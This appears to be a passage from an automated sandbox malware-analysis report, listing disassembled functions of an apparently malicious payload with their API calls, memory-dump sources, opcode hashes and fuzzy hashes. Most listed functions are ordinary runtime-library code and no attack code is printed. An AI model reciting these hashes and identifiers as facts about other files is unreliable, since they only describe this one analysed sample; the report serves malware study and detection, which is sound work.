                                                                                                        • Instruction Fuzzy Hash: 82F0283190021D66CB00FAA8DC52EDEBBACEF40330F044466FD04A6282DFB49B48B2D0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F64C00 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00F64AE0: GetStdHandle.KERNEL32(000000F4,00F64C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,00F6480E,.\crypto\cryptlib.c,00000253,pointer != NULL,00000000,00F61D37,00000000,00F1CDAE,00000001,00000001), ref: 00F64AFA
                                                                                                          • Part of subcall function 00F64AE0: GetFileType.KERNEL32(00000000), ref: 00F64B05
                                                                                                          • Part of subcall function 00F64AE0: __vfwprintf_p.LIBCMT ref: 00F64B27
                                                                                                        • _raise.LIBCMT ref: 00F64C18
                                                                                                          • Part of subcall function 00F3A12E: __getptd_noexit.LIBCMT ref: 00F3A16B
                                                                                                          • Part of subcall function 00F37CEC: _doexit.LIBCMT ref: 00F37CF6
                                                                                                        Strings
                                                                                                        • %s(%d): OpenSSL internal error, assertion failed: %s, xrefs: 00F64C0C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileHandleType__getptd_noexit__vfwprintf_p_doexit_raise
                                                                                                        • String ID: %s(%d): OpenSSL internal error, assertion failed: %s
                                                                                                        • API String ID: 2149077303-4210838268
                                                                                                        • Opcode ID: 790a41ceb59e7e553eec3c08c7a7362dd7f2769c3861f1bd8db94303f3465423
                                                                                                        • Instruction ID: 4319a33543baf95fc040fb2d82d6bd22e6263733cceae4d8dff24ec21ab9dc29
                                                                                                        • Opcode Fuzzy Hash: 790a41ceb59e7e553eec3c08c7a7362dd7f2769c3861f1bd8db94303f3465423
                                                                                                        • Instruction Fuzzy Hash: ABD05E79088300BFD9123B90AC03A0A7AA1BF48724F408414F29A000A2C67A8120BB17
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1FD57 Relevance: 3.1, APIs: 2, Instructions: 134fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _wcsstr$Find$CloseExtensionFileNextPath
                                                                                                        • String ID:
                                                                                                        • API String ID: 2799698630-0
                                                                                                        • Opcode ID: 99b0959d05d18ea14f0c3cfe204045000cdc59a3da1f0e462c521042a6227104
                                                                                                        • Instruction ID: 6d6ccb7fd7dd9e526316216733b0891b551655494d0cae1fa85706e1a8c48976
                                                                                                        • Opcode Fuzzy Hash: 99b0959d05d18ea14f0c3cfe204045000cdc59a3da1f0e462c521042a6227104
                                                                                                        • Instruction Fuzzy Hash: 4E519F71D00229CAEF60DF60EC457EEB7B5BF21318F0441A9D40D67251EB769A88EF52
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F32310 Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __lock_file_memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 26237723-0
                                                                                                        • Opcode ID: 9ca1dbdf695b64d6df0e43d357e347b19a940b5e1ad95bcffbb217e4de8ff930
                                                                                                        • Instruction ID: d394db1e49be20c49a7cd8b95a977344702d092b1b464ce782e774c5565cea5f
                                                                                                        • Opcode Fuzzy Hash: 9ca1dbdf695b64d6df0e43d357e347b19a940b5e1ad95bcffbb217e4de8ff930
                                                                                                        • Instruction Fuzzy Hash: 52016771C01209EBCF52AFA58C0199F7B61AF41770F184115F92856151DB3DCA62FF91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F33A38 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00F35208: __getptd_noexit.LIBCMT ref: 00F35208
                                                                                                        • __lock_file.LIBCMT ref: 00F33A7D
                                                                                                          • Part of subcall function 00F30E53: __lock.LIBCMT ref: 00F30E76
                                                                                                        • __fclose_nolock.LIBCMT ref: 00F33A88
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                        • String ID:
                                                                                                        • API String ID: 2800547568-0
                                                                                                        • Opcode ID: 050a69010352d4c5ccf5dc30d534691e0a81941ef8d609430d78bd55560c7f5d
                                                                                                        • Instruction ID: 92d5a03f6680ac3ccbd3463f9e5bcf0577b3d7e8c205844cc8ec6ca49c5b714d
                                                                                                        • Opcode Fuzzy Hash: 050a69010352d4c5ccf5dc30d534691e0a81941ef8d609430d78bd55560c7f5d
                                                                                                        • Instruction Fuzzy Hash: 38F09032901704AADB10EFA98C027AE7AA56F41735F148249F4A4AB1C1CB7C9B02BB51
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F33455 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __lock_file.LIBCMT ref: 00F33489
                                                                                                        • __ftell_nolock.LIBCMT ref: 00F33494
                                                                                                          • Part of subcall function 00F35208: __getptd_noexit.LIBCMT ref: 00F35208
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                                                        • String ID:
                                                                                                        • API String ID: 2999321469-0
                                                                                                        • Opcode ID: 6e7f63be4174e24d32a93e8d050001924c70a59e6ffc46796fa46864a77c74c9
                                                                                                        • Instruction ID: e8b008dd7a2dcb7038e692e0d2bc0a1b67cab198a2fa3d918289b49d155746a1
                                                                                                        • Opcode Fuzzy Hash: 6e7f63be4174e24d32a93e8d050001924c70a59e6ffc46796fa46864a77c74c9
                                                                                                        • Instruction Fuzzy Hash: DDF0A032A012049AD711FBB5DC0279E76A05F41335F244605F420AB1C2CF7C8A427AA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F3FB64 Relevance: 3.0, APIs: 2, Instructions: 17COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __lock.LIBCMT ref: 00F3FB7B
                                                                                                          • Part of subcall function 00F38AF7: __mtinitlocknum.LIBCMT ref: 00F38B09
                                                                                                          • Part of subcall function 00F38AF7: __amsg_exit.LIBCMT ref: 00F38B15
                                                                                                          • Part of subcall function 00F38AF7: EnterCriticalSection.KERNEL32(00000000,?,00F350D7,0000000D), ref: 00F38B22
                                                                                                        • __tzset_nolock.LIBCMT ref: 00F3FB8E
                                                                                                          • Part of subcall function 00F3FE47: __lock.LIBCMT ref: 00F3FE6C
                                                                                                          • Part of subcall function 00F3FE47: ____lc_codepage_func.LIBCMT ref: 00F3FEB3
                                                                                                          • Part of subcall function 00F3FE47: __getenv_helper_nolock.LIBCMT ref: 00F3FED4
                                                                                                          • Part of subcall function 00F3FE47: _free.LIBCMT ref: 00F3FF07
                                                                                                          • Part of subcall function 00F3FE47: _strlen.LIBCMT ref: 00F3FF0E
                                                                                                          • Part of subcall function 00F3FE47: __malloc_crt.LIBCMT ref: 00F3FF15
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __lock$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1282695788-0
                                                                                                        • Opcode ID: e42d93314165367f1656a7e2447554fa6aac77b9bff0b494491b7d06ea31e65a
                                                                                                        • Instruction ID: 7fd4a3244a8dcfdee980f4215b7d17ca50f3c98dc22e8485661366ed51d645d0
                                                                                                        • Opcode Fuzzy Hash: e42d93314165367f1656a7e2447554fa6aac77b9bff0b494491b7d06ea31e65a
                                                                                                        • Instruction Fuzzy Hash: 5EE08C75D4038ADAEA70BBB0DD46318B120AB40332F249119F050101C68FFC0189EB22
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F37B0B Relevance: 3.0, APIs: 2, Instructions: 7COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ___crtCorExitProcess.LIBCMT ref: 00F37B11
                                                                                                          • Part of subcall function 00F37AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,00F37B16,00000000,?,00F38BCA,000000FF,0000001E,01017BD0,00000008,00F38B0E,00000000,00000000), ref: 00F37AE6
                                                                                                          • Part of subcall function 00F37AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00F37AF8
                                                                                                        • ExitProcess.KERNEL32 ref: 00F37B1A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                        • String ID:
                                                                                                        • API String ID: 2427264223-0
                                                                                                        • Opcode ID: 2904aa0deadc30ac9f38701a82b55f6b01a56bab67d98831f369164cb8ac78d2
                                                                                                        • Instruction ID: 24376b462199e819c4e77428f1fdd948c982f029138fd4cf921681f6be0dd6ae
                                                                                                        • Opcode Fuzzy Hash: 2904aa0deadc30ac9f38701a82b55f6b01a56bab67d98831f369164cb8ac78d2
                                                                                                        • Instruction Fuzzy Hash: 79B0923000920CBBCF063F61DC0A85D3F2AEB003A2F008025F90408031EB76AA91AAD0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F218C5 Relevance: 2.5, APIs: 2, Instructions: 21COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F218DD
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 00F218E9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseFreeHandleVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 2443081362-0
                                                                                                        • Opcode ID: 6d21362ea36dd17115784930885c6b72cc330644b4dd5805201d60f096d485b4
                                                                                                        • Instruction ID: 9ce67263e41911643c5cc57468d155cbbcb098f09ed29e68dcd3db20d494e2fd
                                                                                                        • Opcode Fuzzy Hash: 6d21362ea36dd17115784930885c6b72cc330644b4dd5805201d60f096d485b4
                                                                                                        • Instruction Fuzzy Hash: B3E08636A015189BC7208B99EC8079DB375F785730F20036AE819732D047312D019984
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F26950 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00F269DF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
                                                                                                        • String ID:
                                                                                                        • API String ID: 120817956-0
                                                                                                        • Opcode ID: 9f02cfa3ffa509d5167ef1b7e14ab37a157488f9f93fcc990f066926ba2c8ede
                                                                                                        • Instruction ID: dca4795049b167742d92cbc3c2693be5c0087139b9bd22999470833f12e179c2
                                                                                                        • Opcode Fuzzy Hash: 9f02cfa3ffa509d5167ef1b7e14ab37a157488f9f93fcc990f066926ba2c8ede
                                                                                                        • Instruction Fuzzy Hash: 8B31E671E006159FCB20DF68D89166EB7F9EB45720F20423DE455D7780DB349D049BA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F26760 Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00F267E6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
                                                                                                        • String ID:
                                                                                                        • API String ID: 120817956-0
                                                                                                        • Opcode ID: b4547d56ee5ead5b09610ccb49d6f4e7af80abc8e169e86aa551c1875ee4d3b3
                                                                                                        • Instruction ID: 1d0a166aef6a0564ff62a4ecd3931882404c5fdbca36821c018025bf7617e357
                                                                                                        • Opcode Fuzzy Hash: b4547d56ee5ead5b09610ccb49d6f4e7af80abc8e169e86aa551c1875ee4d3b3
                                                                                                        • Instruction Fuzzy Hash: F131F0B1E006159BDB24CF68E9807AEFBE4EF44760F20462DE466D77C0DB309A44D7A2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F26570 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00F265C5
                                                                                                          • Part of subcall function 00F33B4C: _malloc.LIBCMT ref: 00F33B64
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 657562460-0
                                                                                                        • Opcode ID: 4916f2dccb3cad78a0b1e1a38ef5ee9142c71fef6d89dff856f67332f2217f0c
                                                                                                        • Instruction ID: cab107ecbf058274b90c591977bd087b8bc2c825fdea9b19a65f6fe29f2939a7
                                                                                                        • Opcode Fuzzy Hash: 4916f2dccb3cad78a0b1e1a38ef5ee9142c71fef6d89dff856f67332f2217f0c
                                                                                                        • Instruction Fuzzy Hash: 6B210275A00125DBCB14DF58DD81B5ABFA9EB45710F088229E805CB348D734EA14DBA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F2FA10 Relevance: 1.5, APIs: 1, Instructions: 19threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0001F130,?,00000000,00000000), ref: 00F2FA25
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
